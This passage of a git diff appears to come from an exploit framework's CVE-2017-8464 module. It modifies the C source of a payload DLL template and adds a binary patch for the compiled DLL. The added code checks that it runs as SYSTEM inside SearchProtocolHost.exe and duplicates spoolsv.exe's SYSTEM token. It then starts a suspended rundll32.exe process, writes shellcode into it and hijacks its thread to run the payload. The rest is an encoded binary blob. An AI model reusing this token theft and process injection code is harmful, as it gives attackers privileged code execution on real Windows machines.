DWORD dwReason, LPVOID lpReserved) case DLL_THREAD_DETACH: break; } - return TRUE; } -void ExecutePayload(void) -{ +BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) { + int result; + + if (strlen(szStr) < strlen(szSuffix)) { + return FALSE; + } + if (bCaseSensitive) { + result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + else { + result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + return result == 0; +} + +BOOL GetProcessSid(HANDLE hProc, PSID *pSid) { + HANDLE hToken; + DWORD dwLength = 0; + TOKEN_USER *tuUser = NULL; + SIZE_T szSid = 0; + + *pSid = NULL; + do { + if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) { + return FALSE; + } + + GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength); + tuUser = (TOKEN_USER *)malloc(dwLength); + if (tuUser == NULL) { + break; + } + + if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) { + break; + } + + szSid = GetLengthSid(tuUser->User.Sid); + *pSid = LocalAlloc(LPTR, szSid); + if (*pSid == NULL) { + break; + } + + if (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid)) { + LocalFree(*pSid); + *pSid = NULL; + } + } while (FALSE); + + if (tuUser != NULL) { + free(tuUser); + } + if (hToken) { + CloseHandle(hToken); + } + + if (*pSid != NULL) { + return TRUE; + } + return FALSE; +} + +BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) { + PSID pTestSid = NULL; + PSID pTargetSid = NULL; + + if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) { + return FALSE; + } + + if (!GetProcessSid(hProc, &pTestSid)) { + LocalFree(pTargetSid); + return FALSE; + } + + *pbResult = EqualSid(pTestSid, pTargetSid); + LocalFree(pTargetSid); + LocalFree(pTestSid); + return TRUE; +} + +DWORD FindProcessId(LPCTSTR szProcessName) { + HANDLE hProcessSnap; + PROCESSENTRY32 pe32; + DWORD result = 0; + + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hProcessSnap == INVALID_HANDLE_VALUE) { + return 0; + } + + pe32.dwSize = sizeof(PROCESSENTRY32); + if (!Process32First(hProcessSnap, &pe32)) { + CloseHandle(hProcessSnap); + return 0; + } + + do { + if (!strcmp(szProcessName, pe32.szExeFile)) { + result = pe32.th32ProcessID; + break; + } + } while (Process32Next(hProcessSnap, &pe32)); + CloseHandle(hProcessSnap); + return result; +} + +HANDLE GetPayloadToken(void) { + HANDLE hTokenHandle = NULL; + HANDLE hProcessHandle = NULL; + BOOL bIsSystem = FALSE; + DWORD dwPid = 0; + CHAR Path[MAX_PATH + 1]; + + ZeroMemory(Path, sizeof(Path)); + GetModuleFileNameA(NULL, Path, MAX_PATH); + if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) { + return NULL; + } + /* loaded into the context of SearchProtocolHost.exe */ + + if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* and running as NT_AUTHORITY SYSTEM */ + + dwPid = FindProcessId("spoolsv.exe"); + if (!dwPid) { + return NULL; + } + + hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); + if (!hProcessHandle) { + return NULL; + } + + bIsSystem = FALSE; + if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */ + + OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle); + CloseHandle(hProcessHandle); + return hTokenHandle; +} + +DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) { + /* wait for the process to exit or 10 seconds before cleaning up */ + WaitForSingleObject(pExploitData->hProcess, 10000); + CloseHandle(pExploitData->hProcess); + CloseHandle(pExploitData->hMutex); + + /* this does not return */ + FreeLibraryAndExitThread(pExploitData->hModule, 0); + return 0; +} + +void ExecutePayload(HANDLE hDll) { PROCESS_INFORMATION pi; STARTUPINFO si; CONTEXT ctx; LPVOID ep; - HANDLE hMutex; SECURITY_ATTRIBUTES MutexAttributes; + SIZE_T dwBytesWritten = 0; + PEXPLOIT_DATA pExploitData = NULL; + HANDLE hToken; - inline_bzero(&MutexAttributes, sizeof(MutexAttributes)); + pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA)); + if (!pExploitData) { + return; + } + + /* keep a reference to the module for synchronization purposes */ + GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule)); + + ZeroMemory(&MutexAttributes, sizeof(MutexAttributes)); MutexAttributes.nLength = sizeof(MutexAttributes); MutexAttributes.bInheritHandle = TRUE; // inherit the handle - hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex"); - if(hMutex == NULL) - { + pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!"); + if (!pExploitData->hMutex) { return; } - if(GetLastError() == ERROR_ALREADY_EXISTS) - { - CloseHandle(hMutex); + if (GetLastError() == ERROR_ALREADY_EXISTS) { + CloseHandle(pExploitData->hMutex); return; } - if(GetLastError() == ERROR_ACCESS_DENIED) - { - CloseHandle(hMutex); + if (GetLastError() == ERROR_ACCESS_DENIED) { + CloseHandle(pExploitData->hMutex); return; } - // Start up the payload in a new process - inline_bzero(&si, sizeof(si)); + hToken = GetPayloadToken(); + + ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); - // Create a suspended process, write shellcode into stack, resume it - if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { - ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL; + /* start up the payload in a new process */ + if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { + ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL; GetThreadContext(pi.hThread, &ctx); - ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0); + WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten); + if (dwBytesWritten == SCSIZE) { #ifdef _WIN64 - ctx.Rip = (DWORD64)ep; + ctx.Rip = (DWORD64)ep; #else - ctx.Eip = (DWORD)ep; + ctx.Eip = (DWORD)ep; #endif - SetThreadContext(pi.hThread, &ctx); - ResumeThread(pi.hThread); + SetThreadContext(pi.hThread, &ctx); + ResumeThread(pi.hThread); - CloseHandle(pi.hThread); - CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + pExploitData->hProcess = pi.hProcess; + } } - CloseHandle(hMutex); + if (hToken) { + CloseHandle(hToken); + } + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL); } - diff --git a/data/exploits/cve-2017-8464/src/template.h b/data/exploits/cve-2017-8464/src/template.h index 7a674c3006..7181e46cba 100644 --- a/data/exploits/cve-2017-8464/src/template.h +++ b/data/exploits/cve-2017-8464/src/template.h @@ -1,3 +1,11 @@ #define SCSIZE 2048 unsigned char code[SCSIZE] = "PAYLOAD:"; +typedef struct { + HANDLE hModule; + HANDLE hMutex; + HANDLE hProcess; +} EXPLOIT_DATA, *PEXPLOIT_DATA; + +#define SIDSTR_SYSTEM _T("s-1-5-18") +#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult) diff --git a/data/exploits/cve-2017-8464/template_x64_windows.dll b/data/exploits/cve-2017-8464/template_x64_windows.dll old mode 100755 new mode 100644 index 40958f8986cbabb90b1e2174d1dcaa6eaa1fa83c..eda57c8d927d138f1786132d7d1324c704bb70c8 GIT binary patch literal 21504 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 